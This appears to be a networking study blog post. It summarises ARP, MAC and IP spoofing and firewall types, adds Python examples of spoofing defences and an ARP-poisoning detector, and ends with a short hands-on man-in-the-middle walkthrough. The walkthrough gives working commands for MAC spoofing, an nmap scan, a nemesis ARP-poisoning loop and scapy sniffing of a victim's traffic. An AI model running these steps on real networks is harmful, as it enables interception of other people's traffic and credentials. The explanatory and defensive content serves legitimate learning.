First, some background from Wikipedia; then an attempt at a man-in-the-middle attack.
Theoretical basis
- Understand the layered architecture of computer networks.
- Get used to actively using search engines to find knowledge.
The following is summarised from Wikipedia.
ARP Spoofing
ARP spoofing is a technique in which an attacker sends forged ARP messages on a LAN, usually to associate the attacker's MAC address with the IP address of another host, so that traffic meant for that host's IP address is delivered to the attacker instead.
ARP spoofing allows an attacker to intercept data frames on a local area network (LAN), modify traffic, or block it. It is usually the opening step of other attacks such as denial of service (DoS), man-in-the-middle (MITM) or session hijacking.
The attack is limited to LANs that use the ARP protocol.
LAN communication needs to translate the network-layer IP address into the data-link-layer MAC address before a frame can be sent on the data link layer. When a host knows another host's IP address, it obtains the MAC address with a broadcast (ARP request); the host that owns the IP answers with an ARP reply containing its MAC address.
ARP is stateless: hosts automatically cache any ARP reply they receive, whether or not they requested it. Even a cache entry that has not yet expired is overwritten by a newer ARP reply, and hosts cannot authenticate the source of the packet.
Generally, an ARP attack comes from a compromised machine on the LAN or directly from the attacker's host. The goal is usually to associate the attacker's MAC address with the IP address of the target machine, so that traffic destined for the target is delivered to the attacker. The attacker can then:
- Intercept the data and forward it to the target unchanged (eavesdropping)
- Modify the data and forward it to the target (MITM)
- Mount a DoS attack on the target by discarding some or all packets
Defensive measures include:
- Static ARP tables.
- Some software applies some form of certification or cross-checking of ARP responses. DHCP servers, individual hosts, Ethernet switches or other network equipment may provide this. For example, multiple IP addresses associated with one MAC address may indicate ARP spoofing.
- Operating systems react differently. Linux ignores unsolicited replies but uses requests seen from other machines to update its cache. Solaris only updates cache entries after a timeout. On Windows the behaviour is configured under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters with the values ArpCacheLife, ArpCacheMinReferenceLife, ArpUseEtherSNAP, ArpTRSingleRoute, ArpAlwaysSourceRoute and ArpRetryCount.
- Host defence. A host can reject any reply that would change the MAC address already in its cache, or accept the new MAC address but first check whether the previous MAC address is still in use. Both rely on the MAC address already in the cache being legitimate.
- Passive detection. Observe ARP requests and replies on the network to build an IP-to-MAC database.
- The DHCP server builds and maintains the corresponding list for the gateway after allocating IP addresses.
MAC Spoofing
MAC spoofing is a technique for changing the MAC (media access control) address of a network interface. The MAC address is hard-coded into the network interface controller and cannot itself be changed, but the operating system can be made to believe that the card uses a MAC address chosen by the user. This changes the identity of the computer, and it is quite simple to do.
It is usually done to bypass access control lists on servers or routers, or to hide a computer or impersonate another network device. Sometimes it is legitimate, sometimes it is not.
- Using new or multiple devices with an ISP that binds service to a MAC address. Attackers can use the same technique.
- Satisfying software that is licensed to a particular MAC address.
- Hiding identity to protect privacy. The MAC address of a Wi-Fi connection is not encrypted, so a network card in monitor mode can easily collect MAC addresses, and MAC spoofing can be used to avoid being tracked. Attackers can however also use it to impersonate authenticated users and carry out illegal activity, which is hard to detect.
A MAC-spoofing host can usually receive traffic (some special switch security configurations can prevent such packets from being forwarded). MAC address forgery is however limited to the local broadcast domain.
IP Spoofing
IP spoofing is the creation of IP packets with a forged source address, either to hide the sender's identity or to impersonate another machine.
By changing the source address field of the IP header, the attacker makes the packet appear to come from another machine. The machine that receives the forged packet sends its reply to the wrong machine. Usually the attacker either does not care about the replies or can reliably observe them by other means.
In certain circumstances an attacker may be able to see or redirect the replies to their own machine. This is most common on a LAN or wireless LAN.
IP spoofing is often used in DoS attacks, because packets appearing to come from many different addresses are difficult to filter, which makes IP-based defences ineffective. Backscatter is a statistical technique based on packets sent to invalid addresses, but more sophisticated attacks avoid invalid addresses.
IP spoofing is also used to bypass IP-based authentication. Although it is very hard to use against remote systems, because thousands of packets may have to be altered at a time, it is very effective between machines on a trusted intranet.
IP spoofing is sometimes used in website performance testing.
Services vulnerable to IP spoofing include:
- RPC
- Any IP-based authentication
- X Window System
- R (remote) services such as rlogin and rsh
Defences
- Packet filtering. The gateway filters the source IP addresses of packets entering or leaving the network, for example with uRPF (unicast reverse path forwarding).
- Designing network protocols and services that do not rely on IP addresses for authentication.
- Some upper-layer protocols provide some defence. For example, TCP uses sequence numbers agreed with the remote machine to ensure that arriving packets belong to an established connection. Because the attacker usually cannot see any response packets, they would have to guess the sequence number to hijack the connection. Some older systems and network devices have predictable TCP sequence numbers.
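The reverse-path check named above, as an added example (not from the original post or any router vendor): the forwarding table, interface names and packet sources are constructed, and `allow_default` is an assumed switch for whether the default route counts as a route back. Strict mode rejects a packet whose source would be reached through a different interface; loose mode only rejects sources with no route at all, so it lets an outside packet claiming an inside address through.

```python
import ipaddress

# Constructed forwarding table (prefix -> interface); a real gateway consults its FIB.
ROUTES = {
    "192.168.1.0/24": "lan0",
    "10.0.0.0/8": "wan0",
    "0.0.0.0/0": "wan0",   # default route
}

def best_route(src):
    """Longest-prefix match for src; returns (network, interface) or None."""
    addr = ipaddress.ip_address(src)
    best = None
    for prefix, iface in ROUTES.items():
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best

def urpf_check(src, ingress, mode="strict", allow_default=False):
    """True if a packet with source src arriving on ingress passes reverse-path filtering.
    strict: the best route back to src must leave via ingress.
    loose:  any route back to src is enough, so only unroutable sources are caught.
    allow_default: whether the default route counts as a route back (assumed off here)."""
    route = best_route(src)
    if route is None or (route[0].prefixlen == 0 and not allow_default):
        return False
    return route[1] == ingress if mode == "strict" else True

def run_sample():
    """Constructed packets as (source address, arriving interface) seen at the gateway."""
    cases = [("192.168.1.102", "lan0"), ("192.168.1.102", "wan0"),
             ("10.1.2.3", "lan0"), ("203.0.113.7", "wan0")]
    strict = {f"{s}@{i}": urpf_check(s, i, "strict", allow_default=True) for s, i in cases}
    loose = {f"{s}@{i}": urpf_check(s, i, "loose") for s, i in cases}
    return strict, loose
```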
Email Spoofing
To be written up later. In fact, I thought of this when the Git server we built on the intranet sent me an email and I received it.
URL Spoofing
To be discussed later. It reminds me of the "dirty traffic" URL hijacking write-ups on WooYun (the "dark cloud" site).
Firewall
Historically, firewall development can be divided into three generations:
- Packet filtering. First-generation firewalls filter individual packets. If a packet matches a rule it is dropped (discarded silently) or rejected (an error is returned). The rules usually match on source address, destination address, protocol and, for TCP and UDP, ports. The firewall keeps no information about connections and is stateless. It works mainly in the lower three layers and only peeks at the source and destination addresses and ports of the transport layer.
- Stateful filtering. Second-generation firewalls have all the functions of the first generation and also work at OSI layer 4, the transport layer. They use the connection state as a criterion, retaining packets until enough have been seen to determine the state of the connection. They record every connection that has passed and determine whether a packet starts a new connection, belongs to an existing one, or neither.
- Application-level firewalls work at the application layer. They understand upper-layer protocols and can therefore detect an illegitimate protocol trying to pass through the firewall on a legitimate port. The so-called next-generation firewall (NGFW) extends and deepens this inspection of the application-layer stack.
Firewalls can also be classified by where they intercept communication and which state they track:
- Network-layer or packet filters work at the relatively low TCP/IP layers and rely on rule-based filtering. There are two kinds:
  - Stateful: stores the current connection phase and the source and destination addresses and ports. A packet that does not belong to an existing connection is evaluated by the rules for new connections; a packet that belongs to a known connection is processed according to that connection.
  - Stateless: needs less memory and is faster, and suits connectionless protocols, but cannot make complex decisions based on the state of the communication. iptables is an example.
- Application-layer firewalls intercept inter-process communication through sockets and filter it with various rules. Because they cannot resist exploitation of lower-level vulnerabilities, they are being replaced by mandatory access control (MAC) application firewalls, i.e. sandboxes.
- Proxies: whether dedicated hardware or software, a proxy works by responding to incoming packets in the manner of an application. A proxy server is a gateway from one network to another for a specific network application, acting on behalf of the users of the network. It isolates the internal network from the external one more completely, but an attacker can also use a compromised machine as a proxy to attack the internal network.
- NAT (network address translation): firewalls usually provide this, and machines behind a firewall usually have private IP addresses. Originally devised to relieve the shortage of IPv4 addresses, it has unexpectedly become an important defence against network reconnaissance.
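The difference between the stateless and stateful filters described above, as an added example (not from the original post): a first-generation rule set must permanently open high ports to let replies in, while a connection-tracking filter accepts inbound packets only for connections the inside opened. The addresses, ports and the `INSIDE` prefix are constructed; the classification names are my own.

```python
from dataclasses import dataclass
INSIDE = "192.168.1."   # constructed: addresses with this prefix are on the protected side

@dataclass(frozen=True)
class Pkt:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False

def stateless_filter(p):
    """First-generation rule set: judges each packet on its own.  To let replies to
    outbound connections back in, it must permanently open every high port to any source."""
    if p.src.startswith(INSIDE):
        return "ACCEPT"                         # anything leaving the inside
    if p.dport >= 1024 and p.ack:
        return "ACCEPT"                         # 'looks like a reply', whoever sent it
    return "DROP"

class StatefulFilter:
    """Second-generation filter: remembers connections, so inbound packets are accepted
    only when they belong to a connection the inside opened."""
    def __init__(self):
        self.table = set()                      # (src, sport, dst, dport) of connections seen
    def classify(self, p):
        if (p.src, p.sport, p.dst, p.dport) in self.table or \
           (p.dst, p.dport, p.src, p.sport) in self.table:
            return "ESTABLISHED"
        if p.syn and not p.ack:
            return "NEW"
        return "INVALID"                        # mid-stream packet of a connection never seen
    def filter(self, p):
        state = self.classify(p)
        if state == "ESTABLISHED":
            return "ACCEPT"
        if state == "NEW" and p.src.startswith(INSIDE):   # only the inside may open connections
            self.table.add((p.src, p.sport, p.dst, p.dport))
            return "ACCEPT"
        return "DROP"

def run_sample():
    """Constructed packets: an outbound SYN, the server's SYN-ACK, and an unsolicited inbound ACK."""
    fw = StatefulFilter()
    packets = [Pkt("192.168.1.102", 40000, "203.0.113.7", 80, syn=True),
               Pkt("203.0.113.7", 80, "192.168.1.102", 40000, syn=True, ack=True),
               Pkt("198.51.100.9", 80, "192.168.1.102", 40001, ack=True)]
    return [(stateless_filter(p), fw.filter(p)) for p in packets]
```

The third packet shows the gap: the stateless rules accept it because it looks like a reply, the stateful filter drops it as INVALID.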
Rogue DHCP
A forged DHCP server; omitted for now.
DNS series
To be put in the DNS notes.
Next, try a man-in-the-middle attack. My phone and laptop are both on the WLAN.
0.0) MAC spoofing
sudo ip link set eth0 down
sudo ip link set dev eth0 address 38:AA:3C:E6:FE:69
sudo ip link set eth0 up
0.1) Preparation
sudo ifconfig wlan0 promisc
sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
1) Scan the network
sudo nmap -sS 192.168.1.0/24
2) ARP attack
while true
do
sudo nemesis arp -v -r -d wlan0 -S 192.168.1.102 -D 192.168.1.1 -h E8:39:DF:08:F4:FB -m EC:88:8F:B4:D6:68 -H E8:39:DF:08:F4:FB -M EC:88:8F:B4:D6:68
sudo nemesis arp -v -r -d wlan0 -S 192.168.1.1 -D 192.168.1.102 -h E8:39:DF:08:F4:FB -m 68:5D:43:2E:AA:59 -H E8:39:DF:08:F4:FB -M 68:5D:43:2E:AA:59
done
3) Monitoring (scapy)
from scapy.all import sniff
pkts = sniff(filter="tcp and host 192.168.1.102", iface="wlan0",
             prn=lambda x: x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))
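As an added example (not part of the original post), here is the passive detection listed under the ARP defences above, applied to the kind of unsolicited replies the loop in step 2 generates: it parses raw Ethernet/ARP frames, builds an IP-to-MAC table and raises an alert when a reply was never requested, when an IP's MAC changes, or when one MAC answers for several IPs. The MAC and IP values are constructed, and the `build_arp` helper exists only to fabricate the sample frames a sniffer would otherwise hand over.

```python
def _mac(s): return bytes.fromhex(s.replace(":", ""))
def _ip(s): return bytes(int(o) for o in s.split("."))
def build_arp(op, sha, spa, tha, tpa):
    """Raw Ethernet II + ARP frame (op 1 = request, 2 = reply); used only to construct sample traffic."""
    dst = _mac("ff:ff:ff:ff:ff:ff") if op == 1 else _mac(tha)
    hdr = b"\x00\x01\x08\x00\x06\x04" + op.to_bytes(2, "big")  # htype, ptype, hlen, plen, op
    return dst + _mac(sha) + b"\x08\x06" + hdr + _mac(sha) + _ip(spa) + _mac(tha) + _ip(tpa)

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_ip) for an ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    op = int.from_bytes(frame[20:22], "big")
    sha = ":".join(f"{b:02x}" for b in frame[22:28])
    spa = ".".join(map(str, frame[28:32]))
    tpa = ".".join(map(str, frame[38:42]))
    return op, sha, spa, tpa

class ArpWatcher:
    """Passive detector: learns IP-MAC pairs from observed ARP traffic and flags anomalies."""
    def __init__(self):
        self.ip_to_mac, self.pending, self.alerts = {}, set(), []  # pending: (asker_ip, asked_ip)

    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] not in (1, 2):
            return
        op, sha, spa, tpa = parsed
        if op == 1:                                  # request: remember who asked for what
            self.pending.add((spa, tpa))
            return
        if (tpa, spa) in self.pending:               # reply answers an outstanding request
            self.pending.discard((tpa, spa))
        else:                                        # nobody asked: the reply type Linux ignores
            self.alerts.append(f"unsolicited reply {spa} is-at {sha}")
        if self.ip_to_mac.get(spa, sha) != sha:      # the mapping for this IP flipped
            self.alerts.append(f"{spa} moved from {self.ip_to_mac[spa]} to {sha}")
        self.ip_to_mac[spa] = sha
        claimed = sorted(ip for ip, mac in self.ip_to_mac.items() if mac == sha)
        if len(claimed) > 1:                         # one MAC now answering for several IPs
            self.alerts.append(f"{sha} claims {claimed}")

def run_sample():
    """Constructed traffic: one legitimate request/reply, then two poisoning replies."""
    gw, victim, atk = "aa:aa:aa:00:00:01", "aa:aa:aa:00:00:02", "aa:aa:aa:00:00:03"
    w = ArpWatcher()
    w.feed(build_arp(1, victim, "192.168.1.102", "00:00:00:00:00:00", "192.168.1.1"))
    w.feed(build_arp(2, gw, "192.168.1.1", victim, "192.168.1.102"))
    w.feed(build_arp(2, atk, "192.168.1.1", victim, "192.168.1.102"))  # "gateway is-at attacker"
    w.feed(build_arp(2, atk, "192.168.1.102", gw, "192.168.1.1"))      # "victim is-at attacker"
    return w.alerts
```

On a live interface the raw frames would come from a packet socket or the scapy sniff call above; the two poisoning replies produce four alerts, including the MAC-moved and one-MAC-many-IPs signals.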